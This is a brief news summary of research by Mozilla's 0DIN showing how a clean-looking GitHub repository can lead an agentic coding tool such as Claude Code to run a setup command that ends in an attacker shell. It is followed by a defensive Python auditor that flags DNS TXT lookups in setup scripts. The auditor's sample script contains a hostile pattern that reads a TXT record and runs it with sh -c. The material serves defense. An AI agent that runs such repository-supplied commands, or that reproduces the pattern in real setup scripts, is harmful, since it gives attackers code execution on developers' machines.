Researchers at Mozilla’s 0DIN showed that a clean-looking GitHub repository can trigger an invisible attack chain when an agentic coding tool like Claude Code tries to fix a normal setup error. The method can end with an attacker-controlled shell on a developer’s device, exposing secrets, files, and persistence opportunities through indirect steps the agent never fully sees.
Key points
- A benign-looking GitHub repository can hide a malicious setup chain.
- Claude Code may automatically run a command to recover from a normal installation error.
- The attack can use a DNS TXT record to deliver attacker-controlled data at runtime.
- Successful exploitation can give the attacker a shell with the developer’s privileges.
- 0DIN says AI agents should disclose the full execution chain of setup commands.
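
A review aid for the DNS TXT point above, added here as an example and not taken from 0DIN's research or from any tool's own code: a heuristic Python audit that flags setup-script lines reading a DNS TXT record and any later line that passes that data to a shell. The regexes, the `audit_script` name and the sample script are assumptions constructed for illustration.

```python
import re

# Real CLI tools that can return a DNS TXT record; "txt" must be a standalone
# argument or option value so that file names like requirements.txt are ignored.
TXT_LOOKUP = re.compile(
    r"\b(dig|nslookup|host|Resolve-DnsName)\b.*(?<![.\w])txt\b", re.I)
# Constructs that hand a string to a shell interpreter.
EXEC_SINK = re.compile(
    r"\b(eval|source)\b|\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b", re.I)
ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_]\w*)=")


def audit_script(text):
    """Return (line_no, severity, line) for TXT lookups and where their output runs."""
    findings, tainted = [], set()
    for no, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # skip comments and the shebang
        runs = bool(EXEC_SINK.search(line))
        if TXT_LOOKUP.search(line):
            m = ASSIGN.match(line)
            if m:
                tainted.add(m.group(1))  # remember the variable holding DNS data
            findings.append((no, "txt-to-exec" if runs else "txt-lookup", line.strip()))
        elif runs and any(re.search(r"\$\{?%s\b" % re.escape(v), line) for v in tainted):
            findings.append((no, "txt-to-exec", line.strip()))
    return findings


# Constructed sample: a hypothetical setup script, not taken from the research.
SAMPLE = """\
#!/bin/sh
# install dependencies
pip install -r requirements.txt
CFG=$(dig +short TXT config.example.invalid)
echo "configuring"
sh -c "$CFG"
curl -fsSL https://example.invalid/health
"""

if __name__ == "__main__":
    for no, sev, line in audit_script(SAMPLE):
        print(f"{no}: {sev}: {line}")
```

The scan is line-based and only follows simple shell variable assignments, so a clean result does not show that a setup chain is safe; it narrows which lines a reviewer reads first.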